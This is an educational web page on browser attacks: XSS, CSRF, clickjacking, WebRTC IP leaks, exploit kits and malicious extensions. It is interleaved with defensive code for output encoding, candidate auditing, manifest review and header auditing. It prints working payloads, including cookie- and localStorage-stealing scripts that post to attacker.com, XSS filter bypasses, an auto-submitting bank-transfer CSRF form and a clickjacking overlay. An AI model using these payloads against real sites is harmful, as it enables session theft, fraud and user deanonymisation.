Browser Security Attacks
The browser is the most complex application most users run: millions of lines of code parsing untrusted content from the internet. Every feature is a potential attack surface: JavaScript engines, DOM parsing, extensions, WebRTC, service workers, and more.
Browsers trust websites to provide code (JavaScript) that runs on users' machines. The same-origin policy tries to isolate sites from each other, but it's constantly under attack. Every SOP bypass is a potential account takeover.
Cross-Site Scripting (XSS)
Inject malicious JavaScript into web pages viewed by other users. The classic web vulnerability that refuses to die. Still in OWASP Top 10 after 20+ years.
Reflected XSS
# Vulnerable URL:
https://target.com/search?q=<script>alert(document.cookie)</script>
# Server reflects input in response:
<h1>Search results for: <script>alert(document.cookie)</script></h1>
# Victim clicks attacker's link → script executes in victim's browser
# Attacker receives victim's session cookie
# Real payload (cookie stealer):
<script>
new Image().src='https://attacker.com/steal?c='+document.cookie;
</script>
# URL-encoded for delivery:
https://target.com/search?q=%3Cscript%3Enew%20Image().src%3D%27https%3A%2F%2Fattacker.com%2Fsteal%3Fc%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E
Stored XSS
# Payload stored in database, served to all users
# Comment field:
<script>
  fetch('https://attacker.com/log', {
    method: 'POST',
    body: JSON.stringify({
      cookies: document.cookie,
      url: location.href,
      localStorage: JSON.stringify(localStorage)
    })
  });
</script>
# Every user who views the page executes the script
# Mass credential theft, worm propagation possible
# Famous example: Samy worm (MySpace, 2005)
# - Stored XSS in profile
# - Added attacker as friend
# - Copied itself to victim's profile
# - 1 million infections in 20 hours
DOM-Based XSS
# Vulnerable JavaScript (client-side only):
var name = location.hash.substring(1);
document.getElementById('greeting').innerHTML = 'Hello, ' + name;
# Attack URL:
https://target.com/page#<img src=x onerror=alert(document.cookie)>
# Payload never hits server - pure client-side vulnerability
# Harder to detect with server-side WAFs
# Common DOM XSS sinks:
innerHTML, outerHTML, document.write(), eval(),
setTimeout(), setInterval(), location.href,
jQuery.html(), $.append()
XSS Filter Bypasses
# Case variation
<ScRiPt>alert(1)</sCrIpT>
# Event handlers
<img src=x onerror=alert(1)>
<body onload=alert(1)>
<svg onload=alert(1)>
<input onfocus=alert(1) autofocus>
# JavaScript protocol
<a href="javascript:alert(1)">click</a>
# Encoding
<script>alert(String.fromCharCode(88,83,83))</script>
<script>\u0061lert(1)</script>
# Breaking out of attributes
" onclick="alert(1)
' onclick='alert(1)
# Template literals (ES6)
<script>alert`1`</script>
# Without parentheses
<script>onerror=alert;throw 1</script>
<script>{onerror=alert}throw 1</script>
# SVG-based
<svg><script>alert(1)</script></svg>
# Mutation XSS (mXSS) - exploits HTML parser differences
<noscript><p title="</noscript><script>alert(1)</script>">
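The fix for every sink shown in this section is the same: encode untrusted data for the context it lands in and refuse dangerous URL schemes. The following is an added example, not code from the original page; all input strings are constructed attacker payloads, and the element passed to renderGreeting is a plain object stand-in for a DOM node so the snippet also runs under Node.

```javascript
// Added example: output encoding that closes the reflected, stored and DOM XSS
// sinks shown above. Not code from the original page.

// HTML text and quoted-attribute context: encode the characters that can open
// a tag, close a quoted attribute, or start an entity.
function escapeHtml(untrusted) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(untrusted).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Attribute values must always be quoted by the template; an unquoted value
// is still breakable with a space even after encoding.
function attr(untrusted) {
  return '"' + escapeHtml(untrusted) + '"';
}

// href/src context: allow only http(s) URLs, same-origin paths and fragments.
// Blocks javascript: and data: schemes (including case and control-character
// tricks) and protocol-relative //host URLs.
function safeUrl(untrusted) {
  const raw = String(untrusted);
  // Browsers strip ASCII control characters and whitespace inside a scheme,
  // so normalise before checking ("java\tscript:" is still javascript:).
  const probe = raw.replace(/[\u0000-\u0020]/g, '').toLowerCase();
  return /^(https?:\/\/|\/(?!\/)|#)/.test(probe) ? raw : 'about:blank';
}

// Fix for the reflected XSS search page: the term is encoded for text context
// and the permalink is built with encodeURIComponent plus attribute encoding.
function renderSearchPage(q) {
  return '<h1>Search results for: ' + escapeHtml(q) + '</h1>\n' +
    '<a href=' + attr('/search?q=' + encodeURIComponent(q)) + '>permalink</a>';
}

// Fix for user-supplied links (the javascript: protocol bypass above).
function renderLink(href, text) {
  return '<a href=' + attr(safeUrl(href)) + '>' + escapeHtml(text) + '</a>';
}

// Fix for the DOM XSS snippet: write the name through textContent, which
// never parses markup, instead of innerHTML. `el` is a DOM element in the
// browser; any object with a textContent property works for the demo.
function renderGreeting(el, name) {
  el.textContent = 'Hello, ' + name;
  return el.textContent;
}
```

Encoding must happen at the output point, not on input: the same string is safe in text context, needs quoting in an attribute, and needs a scheme check in an href.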
xsshunter.com - Detect blind XSS with automatic screenshots and data exfiltration.
Cross-Site Request Forgery (CSRF)
Trick a user's browser into making unwanted requests to sites where they're authenticated. The browser automatically includes cookies, so the forged request appears legitimate.
<!-- Attacker's page: evil.com/cats.html -->
<h1>Cute Cat Pictures!</h1>
<!-- Hidden form that submits automatically -->
<form action="https://bank.com/transfer" method="POST" id="csrf">
<input type="hidden" name="to" value="attacker_account">
<input type="hidden" name="amount" value="10000">
</form>
<script>document.getElementById('csrf').submit();</script>
<!-- Or with an image (GET request) -->
<img src="https://bank.com/transfer?to=attacker&amount=10000">
<!-- Victim visits evil.com while logged into bank.com -->
<!-- Browser sends bank.com cookies with the forged request -->
<!-- Bank sees valid session, processes transfer -->
CSRF Defenses & Bypasses
# CSRF Token bypass techniques:
# 1. Token not validated
# - Remove token parameter entirely
# - Server doesn't check if missing
# 2. Token tied to wrong session
# - Use your own valid token for victim
# - Server validates token exists, not ownership
# 3. Token in GET parameter
https://target.com/action?csrf=abc123&do=something
# Referer header leaks token to attacker
# 4. Token only checked for POST
# - Convert POST to GET
# - Server only validates POST requests
# 5. Weak token generation
# - Predictable tokens (timestamp, sequential)
# - Brute-forceable short tokens
# SameSite cookie bypass:
# SameSite=Lax allows GET from top-level navigation
# Convert POST action to GET if server accepts both
Clickjacking
Overlay an invisible iframe on top of decoy content. The user thinks they're clicking a button on the decoy page but is actually clicking something inside the hidden iframe.
<!-- Attacker's page -->
<style>
  iframe {
    position: absolute;
    top: 0;
    left: 0;
    width: 500px;
    height: 200px;
    opacity: 0.0001; /* Nearly invisible */
    z-index: 2;
  }
  .decoy-button {
    position: absolute;
    top: 50px;
    left: 100px;
    z-index: 1;
  }
</style>
<div class="decoy-button">
  <h1>Click to Win iPhone!</h1>
  <button>CLAIM PRIZE</button>
</div>
<!-- Invisible iframe positioned so "Delete Account" aligns with decoy button -->
<iframe src="https://target.com/settings"></iframe>
<!-- User clicks "CLAIM PRIZE" but actually clicks "Delete Account" -->
Clickjacking Variants
- Likejacking: Trick users into "liking" content (Facebook)
- Cursorjacking: Hide real cursor, show fake one offset from actual
- Filejacking: Trick users into downloading/uploading files
- Drag-and-drop: Hijack drag operations to exfiltrate data
WebRTC IP Leaks
WebRTC can reveal a user's real IP address even when using VPN or Tor. JavaScript can enumerate local network interfaces.
// Discover local IPs via WebRTC
const rtc = new RTCPeerConnection({iceServers: []});
rtc.createDataChannel('');
rtc.createOffer().then(offer => rtc.setLocalDescription(offer));
rtc.onicecandidate = (event) => {
  if (event.candidate) {
    // Extract IP from ICE candidate
    const ip = event.candidate.candidate.match(
      /([0-9]{1,3}\.){3}[0-9]{1,3}/
    );
    if (ip) {
      console.log('Discovered IP:', ip[0]);
      // Send to attacker server
      fetch('https://attacker.com/log?ip=' + ip[0]);
    }
  }
};
// Can reveal:
// - Local IP (192.168.x.x, 10.x.x.x)
// - VPN tunnel IP
// - Real public IP (bypassing VPN in some cases)
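What the handler above actually receives is an ICE candidate line, and what it reveals depends on the candidate type. The following is an added example, not code from the original page: a parser for those lines plus a classifier that a privacy audit or test suite can run to see which candidates expose an address. The candidate strings are constructed for the demo. Two caveats worth knowing when reading the page's snippet: current Chrome, Firefox and Safari replace the private IP in host candidates with a random mDNS `.local` name by default, so the page's IPv4 regex finds nothing there, and server-reflexive (srflx) candidates, the ones carrying the public address, only appear when a STUN server is configured, which the page's `iceServers: []` does not do.

```javascript
// Added example: parse and classify ICE candidate lines to audit address
// exposure. Not code from the original page.

// Format: candidate:<foundation> <component> <transport> <priority> <address> <port> typ <type> ...
function parseIceCandidate(line) {
  const f = line.trim().replace(/^a=/, '').split(/\s+/);
  if (f.length < 8 || !f[0].startsWith('candidate:') || f[6] !== 'typ') return null;
  return { transport: f[2].toLowerCase(), address: f[4], port: Number(f[5]), type: f[7] };
}

// What the connection address says about the user.
function classifyAddress(addr) {
  if (/\.local$/i.test(addr)) return 'mdns';              // obfuscated host candidate
  if (addr.includes(':')) {
    if (addr === '::1') return 'loopback';
    return addr.toLowerCase().startsWith('fe80:') ? 'link-local' : 'ipv6';
  }
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(addr);
  if (!m) return 'unknown';
  const a = Number(m[1]);
  const b = Number(m[2]);
  if (a === 127) return 'loopback';
  if (a === 169 && b === 254) return 'link-local';
  if (a === 10 || (a === 172 && b >= 16 && b <= 31) || (a === 192 && b === 168)) return 'private';
  return 'public';
}

// A candidate exposes something useful to the page unless it is a TURN relay
// address, an mDNS name, or a loopback/link-local address.
function exposesAddress(candidate) {
  if (candidate.type === 'relay') return false;
  const kind = classifyAddress(candidate.address);
  return !['mdns', 'loopback', 'link-local', 'unknown'].includes(kind);
}

function auditCandidates(lines) {
  const findings = [];
  for (const line of lines) {
    const c = parseIceCandidate(line);
    if (!c) continue;
    findings.push({ type: c.type, address: c.address, kind: classifyAddress(c.address), exposed: exposesAddress(c) });
  }
  return findings;
}

// Constructed sample candidates (addresses from documentation ranges).
const SAMPLE_CANDIDATES = [
  'candidate:1 1 udp 2122260223 192.168.1.23 54321 typ host generation 0',
  'candidate:2 1 udp 2122260223 3f1e9a2c-6b0d-4a8e-9c11-2f5d8e7a1b4c.local 54322 typ host generation 0',
  'candidate:3 1 udp 1686052607 203.0.113.45 54321 typ srflx raddr 0.0.0.0 rport 0 generation 0',
  'candidate:4 1 udp 41885439 198.51.100.7 3478 typ relay raddr 203.0.113.45 rport 54321',
];
```

In a browser the same audit runs from `onicecandidate` by passing `event.candidate.candidate` to `parseIceCandidate`; a srflx candidate whose address is not the VPN's exit address is the signal that WebRTC traffic is leaving the tunnel.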
Browser Exploitation
Memory corruption bugs in browsers can lead to arbitrary code execution. Drive-by downloads without user interaction.
Exploit Delivery Methods
- Malvertising: Malicious ads on legitimate sites
- Watering hole: Compromise sites targets visit
- Phishing: Links to exploit pages
- Exploit kits: Automated browser fingerprinting and exploitation
# Exploit Kit (EK) typical flow:
1. Traffic Distribution System (TDS)
- Filters bots, researchers, repeated visits
- Redirects real victims to EK landing page
2. Landing Page
- Fingerprints browser, plugins, OS
- Checks for virtualization (sandbox detection)
- Selects appropriate exploit
3. Exploit Delivery
- Serves exploit for detected vulnerability
- Common targets: Browser engine, Flash, Java, PDF
- Multiple exploits tried in sequence
4. Payload Execution
- Shellcode downloads malware
- Persistence mechanisms installed
- C2 communication established
# Famous EKs (now largely defunct):
# Angler, RIG, Magnitude, Nuclear, Blackhole
Malicious Browser Extensions
Browser extensions have deep access to browsing data. Malicious or compromised extensions can steal everything.
# Dangerous permissions in manifest.json:
"permissions": [
  "<all_urls>",          // Access ALL websites
  "webRequest",          // Intercept/modify requests
  "webRequestBlocking",  // Block requests
  "tabs",                // Access all open tabs
  "cookies",             // Read ALL cookies
  "history",             // Browsing history
  "storage",             // Unlimited storage
  "clipboardRead",       // Read clipboard
  "nativeMessaging"      // Launch native apps
]
# What malicious extensions can do:
# - Steal all passwords (inject into login forms)
# - Read all cookies (session hijacking)
# - Modify banking pages (inject fake forms)
# - Cryptomining in background
# - Proxy all traffic through attacker server
# - Keylogging
# Attack vectors:
# - Malicious extension in store
# - Legitimate extension sold to malicious buyer
# - Extension update compromised
# - Sideloading via social engineering
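Reviewing an extension before it is allowed into a fleet comes down to reading the manifest for the permissions listed above and, more importantly, the combinations of them. The following is an added example, not code from the original page or any real extension: an audit that flags the high-impact permissions from the list, every-site host patterns wherever they can be declared (MV2 `permissions`, MV3 `host_permissions`, content script `matches`), and the combinations that turn wide reach into session theft. The sample manifest is constructed for the demo.

```javascript
// Added example: manifest review for the permissions discussed above.
// Not code from the original page.

// Permissions from the list above that give an extension data or control the
// user would not expect. "storage" is omitted: it is benign on its own.
const RISKY_PERMISSIONS = {
  webRequest: 'observes every request, including headers, on granted hosts',
  webRequestBlocking: 'can block or rewrite requests on granted hosts',
  tabs: 'reads the URL and title of every open tab',
  cookies: 'reads cookies, including session cookies, on granted hosts',
  history: 'reads the full browsing history',
  clipboardRead: 'reads the clipboard',
  nativeMessaging: 'can start and talk to a native program outside the browser sandbox',
};

// Match patterns that reach every site: "<all_urls>", "*://*/*", "https://*/*".
function isAllHosts(pattern) {
  return pattern === '<all_urls>' || /^(\*|https?):\/\/\*\//.test(pattern);
}

function auditManifest(manifest) {
  const perms = [...(manifest.permissions || []), ...(manifest.optional_permissions || [])];
  const hosts = [
    ...perms.filter((p) => p === '<all_urls>' || p.includes('://')),   // MV2 style
    ...(manifest.host_permissions || []),                              // MV3 style
    ...(manifest.content_scripts || []).flatMap((cs) => cs.matches || []),
  ];
  const findings = [];
  for (const p of perms) {
    if (RISKY_PERMISSIONS[p]) findings.push({ item: p, severity: 'high', reason: RISKY_PERMISSIONS[p] });
  }
  const allHosts = hosts.filter(isAllHosts);
  for (const h of allHosts) {
    findings.push({ item: h, severity: 'high', reason: 'can run on or read every website' });
  }
  // Combinations are what turn "high" into "critical": every-site reach plus
  // cookie or request access is enough for the session hijacking and page
  // tampering listed above.
  if (allHosts.length > 0) {
    for (const p of ['cookies', 'webRequest', 'webRequestBlocking']) {
      if (perms.includes(p)) {
        findings.push({ item: `${p} + ${allHosts[0]}`, severity: 'critical', reason: `${p} applies to every site` });
      }
    }
  }
  return findings;
}

function riskLevel(findings) {
  if (findings.some((f) => f.severity === 'critical')) return 'critical';
  if (findings.some((f) => f.severity === 'high')) return 'high';
  return 'low';
}

// Constructed manifest for the demo (not a real extension).
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: 'demo-extension',
  permissions: ['cookies', 'webRequest', 'storage', 'tabs'],
  host_permissions: ['<all_urls>'],
  content_scripts: [{ matches: ['*://*/*'], js: ['content.js'] }],
};
```

The same audit is worth re-running on every update of an already-approved extension, since the "legitimate extension sold to malicious buyer" and "update compromised" vectors above show up first as a permissions change in the new manifest.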
Browser Security Headers
# Content Security Policy - Mitigate XSS
Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self'
# Prevent clickjacking
X-Frame-Options: DENY
Content-Security-Policy: frame-ancestors 'none'
# Prevent MIME sniffing
X-Content-Type-Options: nosniff
# Enable XSS filter (legacy)
X-XSS-Protection: 1; mode=block
# Strict transport security
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
# Referrer policy
Referrer-Policy: strict-origin-when-cross-origin
# Permissions policy (disable dangerous features)
Permissions-Policy: geolocation=(), camera=(), microphone=()
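The header set above is only as good as its weakest directive, which is why the CSP Evaluator tool exists. The following is an added example, not code from the original page or from Google's tool: a small CSP parser and a header audit that reports the gaps relevant to the XSS and clickjacking sections (unsafe-inline and unsafe-eval, wildcard sources, missing object-src and base-uri, missing framing protection, missing nosniff, short HSTS). The two header sets at the bottom are constructed for the demo.

```javascript
// Added example: audit response headers and the CSP they carry.
// Not code from the original page.

// Parse "directive value value; directive ..." into a Map. As in browsers,
// a repeated directive keeps its first occurrence.
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(';')) {
    const [name, ...values] = part.trim().split(/\s+/).filter(Boolean);
    if (!name) continue;
    const key = name.toLowerCase();
    if (!directives.has(key)) directives.set(key, values.map((v) => v.toLowerCase()));
  }
  return directives;
}

function auditCsp(policy) {
  const d = parseCsp(policy);
  const findings = [];
  const scripts = d.get('script-src') || d.get('default-src');
  if (!scripts) {
    findings.push('no script-src or default-src: scripts load from anywhere');
  } else {
    const hasNonceOrHash = scripts.some((s) => s.startsWith("'nonce-") || s.startsWith("'sha"));
    // 'unsafe-inline' is ignored by CSP3 browsers once a nonce or hash is present.
    if (scripts.includes("'unsafe-inline'") && !hasNonceOrHash) {
      findings.push("script-src allows 'unsafe-inline': injected inline scripts still run");
    }
    if (scripts.includes("'unsafe-eval'")) {
      findings.push("script-src allows 'unsafe-eval': eval() and string setTimeout() sinks stay usable");
    }
    if (scripts.some((s) => ['*', 'https:', 'http:', 'data:'].includes(s))) {
      findings.push('script-src has a wildcard or scheme-only source');
    }
  }
  if (!d.has('object-src') && !d.has('default-src')) {
    findings.push('no object-src: plugin content can be embedded');
  }
  if (!d.has('base-uri')) {
    findings.push('no base-uri: an injected <base> tag can redirect relative script URLs');
  }
  return findings;
}

// headers: plain object of response header name -> value (case-insensitive).
function auditHeaders(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);
  const findings = [];
  const csp = h['content-security-policy'];
  if (csp) findings.push(...auditCsp(csp));
  else findings.push('no Content-Security-Policy');
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  const frameAncestors = csp ? parseCsp(csp).has('frame-ancestors') : false;
  if (!frameAncestors && xfo !== 'DENY' && xfo !== 'SAMEORIGIN') {
    findings.push('no frame-ancestors or X-Frame-Options: page can be framed (clickjacking)');
  }
  if ((h['x-content-type-options'] || '').trim().toLowerCase() !== 'nosniff') {
    findings.push('missing X-Content-Type-Options: nosniff');
  }
  const maxAge = Number((/max-age=(\d+)/i.exec(h['strict-transport-security'] || '') || [])[1] || 0);
  if (maxAge < 31536000) findings.push('HSTS missing or max-age below one year');
  return findings;
}

// Constructed header sets for the demo.
const HARDENED_HEADERS = {
  'Content-Security-Policy': "default-src 'self'; script-src 'self'; style-src 'self'; frame-ancestors 'none'; base-uri 'self'",
  'X-Frame-Options': 'DENY',
  'X-Content-Type-Options': 'nosniff',
  'Strict-Transport-Security': 'max-age=31536000; includeSubDomains; preload',
};
const WEAK_HEADERS = {
  'Content-Security-Policy': "script-src 'unsafe-inline' 'unsafe-eval' *",
};
```

Run against the exact CSP line given above (without base-uri), the audit reports one finding, the missing base-uri; adding `base-uri 'self'` clears it.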
Browser Attack Tools
- BeEF (beefproject.com): Browser Exploitation Framework - hook browsers and control them.
- XSStrike: Advanced XSS detection with fuzzing and filter bypass.
  python xsstrike.py -u "https://target.com/?q="
- Dalfox: Fast parameter analysis and XSS scanning.
  dalfox url "https://target.com/?q=test"
- CSP Evaluator (csp-evaluator.withgoogle.com): Google's tool to analyze and find weaknesses in CSP.